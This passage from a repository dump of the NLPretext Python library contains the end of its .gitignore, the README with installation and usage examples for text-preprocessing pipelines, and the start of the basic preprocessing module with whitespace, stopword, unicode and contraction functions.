127 | # C extensions
128 | *.so
129 |
130 | # Distribution / packaging
131 | .Python
132 | env/
133 | build/
134 | develop-eggs/
135 | dist/
136 | downloads/
137 | eggs/
138 | .eggs/
139 | lib/
140 | lib64/
141 | parts/
142 | sdist/
143 | var/
144 | wheels/
145 | pip-wheel-metadata/
146 | share/python-wheels/
147 | *.egg-info/
148 | .installed.cfg
149 | *.egg
150 | MANIFEST
151 |
152 | # PyInstaller
153 | # Usually these files are written by a python script from a template
154 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
155 | *.manifest
156 | *.spec
157 |
158 | # Installer logs
159 | pip-log.txt
160 | pip-delete-this-directory.txt
161 |
162 | # Unit test / coverage reports
163 | htmlcov/
164 | .tox/
165 | .nox/
166 | .coverage
167 | .coverage.*
168 | .cache
169 | nosetests.xml
170 | coverage.xml
171 | *.cover
172 | .hypothesis/
173 | .pytest_cache/
174 | .ruff_cache/
175 |
176 | # Translations
177 | *.mo
178 | *.pot
179 |
180 | # Scrapy stuff:
181 | .scrapy
182 |
183 | # Django stuff:
184 | *.log
185 |
186 | # Sphinx documentation
187 | docs/_build/
188 |
189 | # PyBuilder
190 | target/
191 |
192 | # pyenv
193 | .python-version
194 |
195 | # poetry
196 | .venv
197 |
198 | # pipenv
199 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
200 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
201 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
202 | # install all needed dependencies.
203 | #Pipfile.lock
204 |
205 | # celery beat schedule file
206 | celerybeat-schedule
207 |
208 | # SageMath parsed files
209 | *.sage.py
210 |
211 | # Spyder project settings
212 | .spyderproject
213 | .spyproject
214 |
215 | # Rope project settings
216 | .ropeproject
217 |
218 | # Mr Developer
219 | .mr.developer.cfg
220 | .project
221 | .pydevproject
222 |
223 | # mkdocs documentation
224 | /site
225 |
226 | # mypy
227 | .mypy_cache/
228 | .dmypy.json
229 | dmypy.json
230 |
231 | # Pyre type checker
232 | .pyre/
233 |
234 | # Plugins
235 | .secrets.baseline
236 |
237 | ### VisualStudioCode ###
238 | .vscode/*
239 | !.vscode/tasks.json
240 | !.vscode/launch.json
241 | !.vscode/extensions.json
242 |
243 | ### VisualStudioCode Patch ###
244 | # Ignore all local history of files
245 | .history
246 |
247 | ### Windows ###
248 | # Windows thumbnail cache files
249 | Thumbs.db
250 | Thumbs.db:encryptable
251 | ehthumbs.db
252 | ehthumbs_vista.db
253 |
254 | # Dump file
255 | *.stackdump
256 |
257 | # Folder config file
258 | [Dd]esktop.ini
259 |
260 | # Recycle Bin used on file shares
261 | $RECYCLE.BIN/
262 |
263 | # Windows Installer files
264 | *.cab
265 | *.msi
266 | *.msix
267 | *.msm
268 | *.msp
269 |
270 | # Windows shortcuts
271 | *.lnk
272 |
273 | ### VisualStudio ###
274 | ## Ignore Visual Studio temporary files, build results, and
275 | ## files generated by popular Visual Studio add-ons.
276 | ##
277 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
278 |
279 | # User-specific files
280 | *.rsuser
281 | *.suo
282 | *.user
283 | *.userosscache
284 | *.sln.docstates
285 |
286 | # User-specific files (MonoDevelop/Xamarin Studio)
287 | *.userprefs
288 |
289 | # Mono auto generated files
290 | mono_crash.*
291 |
292 | # Build results
293 | [Dd]ebug/
294 | [Dd]ebugPublic/
295 | [Rr]elease/
296 | [Rr]eleases/
297 | x64/
298 | x86/
299 | [Aa][Rr][Mm]/
300 | [Aa][Rr][Mm]64/
301 | bld/
302 | [Bb]in/
303 | [Oo]bj/
304 | [Ll]og/
305 |
306 | # Visual Studio 2015/2017 cache/options directory
307 | .vs/
308 | # Uncomment if you have tasks that create the project's static files in wwwroot
309 | #wwwroot/
310 |
311 | # Visual Studio 2017 auto generated files
312 | Generated\ Files/
313 |
314 | # MSTest test Results
315 | [Tt]est[Rr]esult*/
316 | [Bb]uild[Ll]og.*
317 |
318 | # NUnit
319 | *.VisualState.xml
320 | TestResult.xml
321 | nunit-*.xml
322 |
323 | # Build Results of an ATL Project
324 | [Dd]ebugPS/
325 | [Rr]eleasePS/
326 | dlldata.c
327 |
328 | # Benchmark Results
329 | BenchmarkDotNet.Artifacts/
330 |
331 | # .NET Core
332 | project.lock.json
333 | project.fragment.lock.json
334 | artifacts/
335 |
336 | # StyleCop
337 | StyleCopReport.xml
338 |
339 | # Files built by Visual Studio
340 | *_i.c
341 | *_p.c
342 | *_h.h
343 | *.ilk
344 | *.obj
345 | *.iobj
346 | *.pch
347 | *.pdb
348 | *.ipdb
349 | *.pgc
350 | *.pgd
351 | *.rsp
352 | *.sbr
353 | *.tlb
354 | *.tli
355 | *.tlh
356 | *.tmp
357 | *.tmp_proj
358 | *_wpftmp.csproj
359 | *.vspscc
360 | *.vssscc
361 | .builds
362 | *.pidb
363 | *.svclog
364 | *.scc
365 |
366 | # Chutzpah Test files
367 | _Chutzpah*
368 |
369 | # Visual C++ cache files
370 | ipch/
371 | *.aps
372 | *.ncb
373 | *.opendb
374 | *.opensdf
375 | *.sdf
376 | *.cachefile
377 | *.VC.db
378 | *.VC.VC.opendb
379 |
380 | # Visual Studio profiler
381 | *.psess
382 | *.vsp
383 | *.vspx
384 | *.sap
385 |
386 | # Visual Studio Trace Files
387 | *.e2e
388 |
389 | # TFS 2012 Local Workspace
390 | $tf/
391 |
392 | # Guidance Automation Toolkit
393 | *.gpState
394 |
395 | # ReSharper is a .NET coding add-in
396 | _ReSharper*/
397 | *.[Rr]e[Ss]harper
398 | *.DotSettings.user
399 |
400 | # JustCode is a .NET coding add-in
401 | .JustCode
402 |
403 | # TeamCity is a build add-in
404 | _TeamCity*
405 |
406 | # DotCover is a Code Coverage Tool
407 | *.dotCover
408 |
409 | # AxoCover is a Code Coverage Tool
410 | .axoCover/*
411 | !.axoCover/settings.json
412 |
413 | # Visual Studio code coverage results
414 | *.coverage
415 | *.coveragexml
416 |
417 | # NCrunch
418 | _NCrunch_*
419 | .*crunch*.local.xml
420 | nCrunchTemp_*
421 |
422 | # MightyMoose
423 | *.mm.*
424 | AutoTest.Net/
425 |
426 | # Web workbench (sass)
427 | .sass-cache/
428 |
429 | # Installshield output folder
430 | [Ee]xpress/
431 |
432 | # DocProject is a documentation generator add-in
433 | DocProject/buildhelp/
434 | DocProject/Help/*.HxT
435 | DocProject/Help/*.HxC
436 | DocProject/Help/*.hhc
437 | DocProject/Help/*.hhk
438 | DocProject/Help/*.hhp
439 | DocProject/Help/Html2
440 | DocProject/Help/html
441 |
442 | # Click-Once directory
443 | publish/
444 |
445 | # Publish Web Output
446 | *.[Pp]ublish.xml
447 | *.azurePubxml
448 | # Note: Comment the next line if you want to checkin your web deploy settings,
449 | # but database connection strings (with potential passwords) will be unencrypted
450 | *.pubxml
451 | *.publishproj
452 |
453 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
454 | # checkin your Azure Web App publish settings, but sensitive information contained
455 | # in these scripts will be unencrypted
456 | PublishScripts/
457 |
458 | # NuGet Packages
459 | *.nupkg
460 | # NuGet Symbol Packages
461 | *.snupkg
462 | # The packages folder can be ignored because of Package Restore
463 | **/[Pp]ackages/*
464 | # except build/, which is used as an MSBuild target.
465 | !**/[Pp]ackages/build/
466 | # Uncomment if necessary however generally it will be regenerated when needed
467 | #!**/[Pp]ackages/repositories.config
468 | # NuGet v3's project.json files produces more ignorable files
469 | *.nuget.props
470 | *.nuget.targets
471 |
472 | # Microsoft Azure Build Output
473 | csx/
474 | *.build.csdef
475 |
476 | # Microsoft Azure Emulator
477 | ecf/
478 | rcf/
479 |
480 | # Windows Store app package directories and files
481 | AppPackages/
482 | BundleArtifacts/
483 | Package.StoreAssociation.xml
484 | _pkginfo.txt
485 | *.appx
486 | *.appxbundle
487 | *.appxupload
488 |
489 | # Visual Studio cache files
490 | # files ending in .cache can be ignored
491 | *.[Cc]ache
492 | # but keep track of directories ending in .cache
493 | !?*.[Cc]ache/
494 |
495 | # Others
496 | ClientBin/
497 | ~$*
498 | *~
499 | *.dbmdl
500 | *.dbproj.schemaview
501 | *.jfm
502 | *.pfx
503 | *.publishsettings
504 | orleans.codegen.cs
505 |
506 | # Including strong name files can present a security risk
507 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
508 | #*.snk
509 |
510 | # Since there are multiple workflows, uncomment next line to ignore bower_components
511 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
512 | #bower_components/
513 |
514 | # RIA/Silverlight projects
515 | Generated_Code/
516 |
517 | # Backup & report files from converting an old project file
518 | # to a newer Visual Studio version. Backup files are not needed,
519 | # because we have git ;-)
520 | _UpgradeReport_Files/
521 | Backup*/
522 | UpgradeLog*.XML
523 | UpgradeLog*.htm
524 | ServiceFabricBackup/
525 | *.rptproj.bak
526 |
527 | # SQL Server files
528 | *.mdf
529 | *.ldf
530 | *.ndf
531 |
532 | # Business Intelligence projects
533 | *.rdl.data
534 | *.bim.layout
535 | *.bim_*.settings
536 | *.rptproj.rsuser
537 | *- [Bb]ackup.rdl
538 | *- [Bb]ackup ([0-9]).rdl
539 | *- [Bb]ackup ([0-9][0-9]).rdl
540 |
541 | # Microsoft Fakes
542 | FakesAssemblies/
543 |
544 | # GhostDoc plugin setting file
545 | *.GhostDoc.xml
546 |
547 | # Node.js Tools for Visual Studio
548 | .ntvs_analysis.dat
549 | node_modules/
550 |
551 | # Visual Studio 6 build log
552 | *.plg
553 |
554 | # Visual Studio 6 workspace options file
555 | *.opt
556 |
557 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
558 | *.vbw
559 |
560 | # Visual Studio LightSwitch build output
561 | **/*.HTMLClient/GeneratedArtifacts
562 | **/*.DesktopClient/GeneratedArtifacts
563 | **/*.DesktopClient/ModelManifest.xml
564 | **/*.Server/GeneratedArtifacts
565 | **/*.Server/ModelManifest.xml
566 | _Pvt_Extensions
567 |
568 | # Paket dependency manager
569 | .paket/paket.exe
570 | paket-files/
571 |
572 | # FAKE - F# Make
573 | .fake/
574 |
575 | # CodeRush personal settings
576 | .cr/personal
577 |
578 | # Python Tools for Visual Studio (PTVS)
579 | *.pyc
580 |
581 | # Cake - Uncomment if you are using it
582 | # tools/**
583 | # !tools/packages.config
584 |
585 | # Tabs Studio
586 | *.tss
587 |
588 | # Telerik's JustMock configuration file
589 | *.jmconfig
590 |
591 | # BizTalk build output
592 | *.btp.cs
593 | *.btm.cs
594 | *.odx.cs
595 | *.xsd.cs
596 |
597 | # OpenCover UI analysis results
598 | OpenCover/
599 |
600 | # Azure Stream Analytics local run output
601 | ASALocalRun/
602 |
603 | # MSBuild Binary and Structured Log
604 | *.binlog
605 |
606 | # NVidia Nsight GPU debugger configuration file
607 | *.nvuser
608 |
609 | # MFractors (Xamarin productivity tool) working folder
610 | .mfractor/
611 |
612 | # Local History for Visual Studio
613 | .localhistory/
614 |
615 | # BeatPulse healthcheck temp database
616 | healthchecksdb
617 |
618 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
619 | MigrationBackup/
620 |
621 | # DotEnv configuration
622 | .env
623 |
624 | # Database
625 | *.db
626 | *.rdb
627 |
628 | # Pycharm
629 | .idea
630 | venv/
631 |
632 | # VS Code
633 | .vscode/
634 |
635 | # Spyder
636 | .spyproject/
637 |
638 | # Jupyter NB Checkpoints
639 | .ipynb_checkpoints/
640 |
641 | # exclude data from source control by default
642 |
643 |
644 | # vim
645 | *.swp
646 | *.swo
647 |
648 | data/
649 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # NLPretext
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 | [](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)
10 | [](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)
11 | [](#supported-python-versions)
12 | [](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)
13 |
14 | [](https://github.com/psf/black)
15 | [](https://github.com/PyCQA/bandit)
16 | [](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml)
17 | [](https://github.com/artefactory/NLPretext/releases)
18 | [](https://github.com/artefactory/NLPretext}/tree/main/docs)
19 | [](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)
20 |
21 | All the goto functions you need to handle NLP use-cases, integrated in NLPretext
22 |
23 |
24 |
25 | # TL;DR
26 |
27 |
28 | > *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face:
29 |
30 | > *Need to efficiently extract email adresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:
31 |
32 |
33 | **NLPretext got you covered!** :rocket:
34 |
35 | NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.
36 |
37 |
38 | :mag: Quickly explore below our preprocessing pipelines and individual functions referential.
39 |
40 | * [Default preprocessing pipeline](#default_pipeline)
41 | * [Custom preprocessing pipeline](#custom_pipeline)
42 | * [Replacing phone numbers](#replace_phone_numbers)
43 | * [Removing hashtags](#remove_hashtags)
44 | * [Extracting emojis](#extract_emojis)
45 | * [Data augmentation](#data_augmentation)
46 |
47 |
48 | Cannot find what you were looking for? Feel free to open an [issue]((https://github.com/artefactory/nlpretext/issues) ).
49 |
50 |
51 |
52 | # Installation
53 |
54 | ### Supported Python Versions
55 |
56 | - Main version supported : `3.8`
57 | - Other supported versions : `3.9`, `3.10`
58 |
59 |
60 | We strongly advise you to do the remaining steps in a virtual environnement.
61 |
62 | To install this library from PyPi, run the following command:
63 |
64 | ```bash
65 | pip install nlpretext
66 | ```
67 |
68 | or with `Poetry`
69 |
70 | ```bash
71 | poetry add nlpretext
72 | ```
73 |
74 |
75 | # Usage
76 |
77 | ## Default pipeline
78 |
79 | Need to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:
80 |
81 | ```python
82 | from nlpretext import Preprocessor
83 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
84 | preprocessor = Preprocessor()
85 | text = preprocessor.run(text)
86 | print(text)
87 | # "I just got the best dinner in my life!!! I recommend"
88 | ```
89 |
90 | ## Create your custom pipeline
91 |
92 | Another possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:
93 |
94 | ```python
95 | from nlpretext import Preprocessor
96 | from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,
97 | remove_stopwords, lower_text)
98 | from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji
99 | text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
100 | preprocessor = Preprocessor()
101 | preprocessor.pipe(lower_text)
102 | preprocessor.pipe(remove_mentions)
103 | preprocessor.pipe(remove_hashtag)
104 | preprocessor.pipe(remove_emoji)
105 | preprocessor.pipe(remove_eol_characters)
106 | preprocessor.pipe(remove_stopwords, args={'lang': 'en'})
107 | preprocessor.pipe(remove_punct)
108 | preprocessor.pipe(normalize_whitespace)
109 | text = preprocessor.run(text)
110 | print(text)
111 | # "dinner life recommend"
112 | ```
113 |
114 | Take a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.
115 |
116 |
117 | ## Load text data
118 |
119 | Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data.
120 | while it is not mandatory our textLoader work best with dask, make sure to have the librairy installed if you want the best performances.
121 |
122 | ```python
123 | from nlpretext.textloader import TextLoader
124 | files_path = "local_folder/texts/text.txt"
125 | text_loader = TextLoader(use_dask=True)
126 | text_dataframe = text_loader.read_text(files_path)
127 | print(text_dataframe.text.values.tolist())
128 | # ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"]
129 | ```
130 |
131 | File path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authentified on a project.
132 |
133 | ```python
134 | text_loader = TextLoader(text_column="name_of_text_column_in_your_data")
135 |
136 | local_file_path = "local_folder/texts/text.csv" # File from local folder
137 | local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder
138 |
139 | gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS
140 | s3_file_path = "s3://my-bucket/texts/text.json" # File from S3
141 | hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS
142 | azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure
143 |
144 | gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard
145 |
146 | text_dataframe_1 = text_loader.read_text(local_file_path)
147 | text_dataframe_2 = text_loader.read_text(local_corpus_path)
148 | text_dataframe_3 = text_loader.read_text(gcs_file_path)
149 | text_dataframe_4 = text_loader.read_text(s3_file_path)
150 | text_dataframe_5 = text_loader.read_text(hdfs_file_path)
151 | text_dataframe_6 = text_loader.read_text(azure_file_path)
152 | text_dataframe_7 = text_loader.read_text(gcs_corpus_path)
153 |
154 | ```
155 |
156 | You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
157 | ```python
158 | text_loader = TextLoader(text_column="text_col")
159 | preprocessor = Preprocessor()
160 |
161 | file_path = "local_folder/texts/text.csv" # File from local folder
162 |
163 | raw_text_dataframe = text_loader.read_text(local_file_path)
164 | preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)
165 |
166 | print(raw_text_dataframe.text_col.values.tolist())
167 | # ["These texts are not preprocessed", "This is bad ## "]
168 |
169 | print(preprocessed_text_dataframe.text_col.values.tolist())
170 | # ["These texts are not preprocessed", "This is bad"]
171 | ```
172 |
173 |
174 | ## Individual Functions
175 |
176 | ### Replacing emails
177 |
178 | ```python
179 | from nlpretext.basic.preprocess import replace_emails
180 | example = "I have forwarded this email to obama@whitehouse.gov"
181 | example = replace_emails(example, replace_with="*EMAIL*")
182 | print(example)
183 | # "I have forwarded this email to *EMAIL*"
184 | ```
185 |
186 | ### Replacing phone numbers
187 |
188 | ```python
189 | from nlpretext.basic.preprocess import replace_phone_numbers
190 | example = "My phone number is 0606060606"
191 | example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*")
192 | print(example)
193 | # "My phone number is *PHONE*"
194 | ```
195 |
196 | ### Removing Hashtags
197 |
198 | ```python
199 | from nlpretext.social.preprocess import remove_hashtag
200 | example = "This restaurant was amazing #food #foodie #foodstagram #dinner"
201 | example = remove_hashtag(example)
202 | print(example)
203 | # "This restaurant was amazing"
204 | ```
205 |
206 | ### Extracting emojis
207 |
208 | ```python
209 | from nlpretext.social.preprocess import extract_emojis
210 | example = "I take care of my skin 😀"
211 | example = extract_emojis(example)
212 | print(example)
213 | # [':grinning_face:']
214 | ```
215 |
216 | ## Data augmentation
217 |
218 | The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.
219 |
220 | ```python
221 | from nlpretext.augmentation.text_augmentation import augment_text
222 | example = "I want to buy a small black handbag please."
223 | entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
224 | example = augment_text(example, method=”wordnet_synonym”, entities=entities)
225 | print(example)
226 | # "I need to buy a small black pocketbook please."
227 | ```
228 |
229 |
230 |
231 |
232 | # 📈 Releases
233 |
234 | You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page.
235 |
236 | We follow [Semantic Versions](https://semver.org/) specification.
237 |
238 | We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.
239 |
240 | For Pull Requests, these labels are configured, by default:
241 |
242 | | **Label** | **Title in Releases** |
243 | | :-----------------------------------: | :---------------------: |
244 | | `enhancement`, `feature` | 🚀 Features |
245 | | `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring |
246 | | `build`, `ci`, `testing` | 📦 Build System & CI/CD |
247 | | `breaking` | 💥 Breaking Changes |
248 | | `documentation` | 📝 Documentation |
249 | | `dependencies` | ⬆️ Dependencies updates |
250 |
251 |
252 | GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.## 🛡 License
253 |
254 | [](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)
255 |
256 | This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) for more details.## 📃 Citation
257 |
258 | ```
259 | @misc{nlpretext,
260 | author = {artefactory},
261 | title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},
262 | year = {2021},
263 | publisher = {GitHub},
264 | journal = {GitHub repository},
265 | howpublished = {\url{https://github.com/artefactory/NLPretext}}}
266 | }
267 | ```
268 |
269 |
270 | # Project Organization
271 | ------------
272 |
273 | .
274 | ├── .github/workflows <- Where the CI and CD lives
275 | ├── datasets/external <- Bash scripts to download external datasets
276 | ├── docker <- All you need to build a Docker image from that package
277 | ├── docs <- Sphinx HTML documentation
278 | ├── nlpretext <- Main Package. This is where the code lives
279 | │ ├── preprocessor.py <- Main preprocessing script
280 | │ ├── text_loader.py <- Main loading script
281 | │ ├── augmentation <- Text augmentation script
282 | │ ├── basic <- Basic text preprocessing
283 | │ ├── cli <- Command lines that can be used
284 | │ ├── social <- Social text preprocessing
285 | │ ├── token <- Token text preprocessing
286 | │ ├── textloader <- File loading
287 | │ ├── _config <- Where the configuration and constants live
288 | │ └── _utils <- Where preprocessing utils scripts lives
289 | ├── references <- assets
290 | ├── tests <- Where the tests lives
291 | ├── .gitignore
292 | ├── .pre-commit-config.yaml <- Pre-commit configuration
293 | ├── CODE_OF_CONDUCT.md <- Code of conduct guidelines
294 | ├── CONTRIBUTING.md <- Contribution guidelines
295 | ├── LICENSE
296 | ├── Makefile
297 | ├── pyproject.toml <- Package build configuration
298 | ├── README.md <- The top-level README for developers using this project.
299 | └── SECURITY.md
300 |
301 | # Credits
302 |
303 | - [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:
304 | - `fix_bad_unicode`
305 | - `normalize_whitespace`
306 | - `unpack_english_contractions`
307 | - `replace_urls`
308 | - `replace_emails`
309 | - `replace_numbers`
310 | - `replace_currency_symbols`
311 | - `remove_punct`
312 | - `remove_accents`
313 | - `replace_phone_numbers` *(with some modifications of our own)*
314 |
--------------------------------------------------------------------------------
/nlpretext/basic/preprocess.py:
--------------------------------------------------------------------------------
1 | # Copyright (C) 2020 Artefact
2 | # licence-information@artefact.com
3 | #
4 | # Licensed under the Apache License, Version 2.0 (the "License");
5 | # you may not use this file except in compliance with the License.
6 | # You may obtain a copy of the License at
7 | #
8 | # http://www.apache.org/licenses/LICENSE-2.0
9 | #
10 | # Unless required by applicable law or agreed to in writing, software
11 | # distributed under the License is distributed on an "AS IS" BASIS,
12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | # See the License for the specific language governing permissions and
14 | # limitations under the License
15 |
16 |
17 | from typing import List, Optional
18 |
19 | import re
20 | import unicodedata
21 |
22 | from flashtext import KeywordProcessor
23 | from ftfy import fix_text as _fix_text
24 | from nlpretext._config import constants
25 | from nlpretext._utils.phone_number import extract_phone_numbers as _extract_phone_numbers
26 | from nlpretext._utils.stopwords import get_stopwords
27 | from nlpretext.token.tokenizer import tokenize
28 |
29 |
30 | def normalize_whitespace(text: str) -> str:
31 | """
32 | ----
33 | Copyright 2016 Chartbeat, Inc.
34 | Code from textacy: https://github.com/chartbeat-labs/textacy
35 | ----
36 |
37 | Given ``text`` str, replace one or more spacings with a single space, and
38 | one or more linebreaks with a single newline. Also strip leading/trailing
39 | whitespace.
40 | eg. " foo bar " -> "foo bar"
41 |
42 | Parameters
43 | ----------
44 | text : string
45 |
46 | Returns
47 | -------
48 | string
49 | """
50 | text = constants.NONBREAKING_SPACE_REGEX.sub(
51 | " ", constants.LINEBREAK_REGEX.sub(r"\n", text)
52 | ).strip()
53 | return text
54 |
55 |
56 | def remove_whitespace(text: str) -> str:
57 | """
58 | Given ``text`` str, remove one or more spacings and linebreaks.
59 | Also strip leading/trailing whitespace.
60 | eg. " foo bar " -> "foobar".
61 |
62 | Parameters
63 | ----------
64 | text : string
65 |
66 | Returns
67 | -------
68 | string
69 | """
70 | return constants.NONBREAKING_SPACE_REGEX.sub(
71 | "", constants.LINEBREAK_REGEX.sub("", text)
72 | ).strip()
73 |
74 |
75 | def lower_text(text: str) -> str:
76 | """
77 | Given ``text`` str, transform it into lowercase.
78 |
79 | Parameters
80 | ----------
81 | text : string
82 |
83 | Returns
84 | -------
85 | string
86 | """
87 | return text.lower()
88 |
89 |
90 | def filter_groups(token: str, ignored_stopwords: Optional[List[str]] = None) -> str:
91 | """
92 | Given ``token`` str and a list of groups of words
93 | that were concatenated into tokens, reverses the tokens
94 | to their ungrouped state.
95 |
96 | Parameters
97 | ----------
98 | token : string
99 | ignored_stopwords : list of strings
100 |
101 | Returns
102 | -------
103 | string
104 | """
105 | if ignored_stopwords:
106 | for group in ignored_stopwords:
107 | if token == remove_whitespace(group):
108 | token = group
109 | return token
110 |
111 |
112 | def ungroup_ignored_stopwords(
113 | tokens: List[str], ignored_stopwords: Optional[List[str]] = None
114 | ) -> List[str]:
115 | """
116 | Given ``tokens`` list of str and a list of groups of words
117 | that are concatenated in tokens, reverses the tokens to
118 | their ungrouped state.
119 |
120 | Parameters
121 | ----------
122 | tokens : list of strings
123 | ignored_stopwords : list of strings
124 |
125 | Returns
126 | -------
127 | list of strings
128 | """
129 | return [filter_groups(token, ignored_stopwords) for token in tokens]
130 |
131 |
132 | def remove_stopwords(
133 | text: str,
134 | lang: str,
135 | custom_stopwords: Optional[List[str]] = None,
136 | ignored_stopwords: Optional[List[str]] = None,
137 | ) -> str:
138 | """
139 | Given ``text`` str, remove classic stopwords for a given language and
140 | custom stopwords given as a list. Words and groups of words from
141 | ignored_stopwords list are ignored during stopwords removal.
142 |
143 | Parameters
144 | ----------
145 | text : string
146 | lang : string
147 | custom_stopwords : list of strings
148 | ignored_stopwords : list of strings
149 |
150 | Returns
151 | -------
152 | string
153 |
154 | Raises
155 | ------
156 | ValueError
157 | if ``custom_stopwords`` and ``ignored_stopwords`` have common elements.
158 | """
159 | if custom_stopwords and ignored_stopwords:
160 | common_elements = set(custom_stopwords).intersection(set(ignored_stopwords))
161 | if common_elements != set():
162 | raise ValueError(
163 | f"Found common words in custom_stopwords and ignored_stopwords: \
164 | {common_elements}. Please remove duplicated values."
165 | )
166 | stopwords = get_stopwords(lang)
167 | if ignored_stopwords:
168 | keyword_processor = KeywordProcessor()
169 | singletons_to_keep = [x for x in ignored_stopwords if len(x.split()) == 1]
170 | for group_of_words in ignored_stopwords:
171 | keyword_processor.add_keyword(group_of_words, remove_whitespace(group_of_words))
172 | text = keyword_processor.replace_keywords(text)
173 | else:
174 | singletons_to_keep = []
175 | if custom_stopwords:
176 | stopwords += custom_stopwords
177 | if not text:
178 | raise ValueError("Found empty text. Please fix it before using this function.")
179 | if lang in ["fr", "en"]:
180 | lang_module = {"fr": "fr_spacy", "en": "en_spacy"}[lang]
181 | tokens = tokenize(text, lang_module)
182 | else:
183 | tokens = text.split()
184 | tokens = [t for t in tokens if (t not in stopwords or t in singletons_to_keep)]
185 | tokens = ungroup_ignored_stopwords(tokens, ignored_stopwords)
186 | return " ".join(tokens)
187 |
188 |
189 | def remove_eol_characters(text: str) -> str:
190 | r"""
191 | Remove end of line (\n) char.
192 |
193 | Parameters
194 | ----------
195 | text : str
196 |
197 | Returns
198 | -------
199 | str
200 | """
201 | text = text.replace("\n", " ")
202 | return text
203 |
204 |
205 | def fix_bad_unicode(text: str, normalization: str = "NFC") -> str:
206 | """
207 | ----
208 | Copyright 2016 Chartbeat, Inc.
209 | Code from textacy: https://github.com/chartbeat-labs/textacy
210 | ----
211 |
212 | Fix unicode text that's "broken" using `ftfy
213 | `_;
214 | this includes mojibake, HTML entities and other code cruft,
215 | and non-standard forms for display purposes.
216 |
217 | Parameters
218 | ----------
219 | text : string
220 |
221 | normalization ({'NFC', 'NFKC', 'NFD', 'NFKD'}):
222 | if 'NFC', combines characters and diacritics written using separate
223 | code points, e.g. converting "e" plus an acute accent modifier into
224 | "é"; unicode
225 | can be converted to NFC form without any change in its meaning!
226 | if 'NFKC', additional normalizations are applied that can change
227 | the meanings of characters, e.g. ellipsis characters will be replaced
228 | with three periods
229 |
230 | Returns
231 | -------
232 | string
233 | """
234 | text = _fix_text(text, normalization=normalization)
235 | return text
236 |
237 |
238 | def unpack_english_contractions(text: str) -> str:
239 | """
240 | ----
241 | Copyright 2016 Chartbeat, Inc.
242 | Code from textacy: https://github.com/chartbeat-labs/textacy
243 | ----
244 |
245 | Replace *English* contractions in ``text`` str with their unshortened
246 | forms.
247 | N.B. The "'d" and "'s" forms are ambiguous (had/would, is/has/possessive),
248 | so are left as-is.
249 | eg. "You're fired. She's nice." -> "You are fired. She's nice."
250 |
251 | Parameters
252 | ----------
253 | text : string
254 |
255 | Returns
256 | -------
257 | string
258 | """
259 | # standard
260 | text = constants.CONTRACTION_NT_NOT.sub(
261 | r"\1\2 not",
262 | text,
